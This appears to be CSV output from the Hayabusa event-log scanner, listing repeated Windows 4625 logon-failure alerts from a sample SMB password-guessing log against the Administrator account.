2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
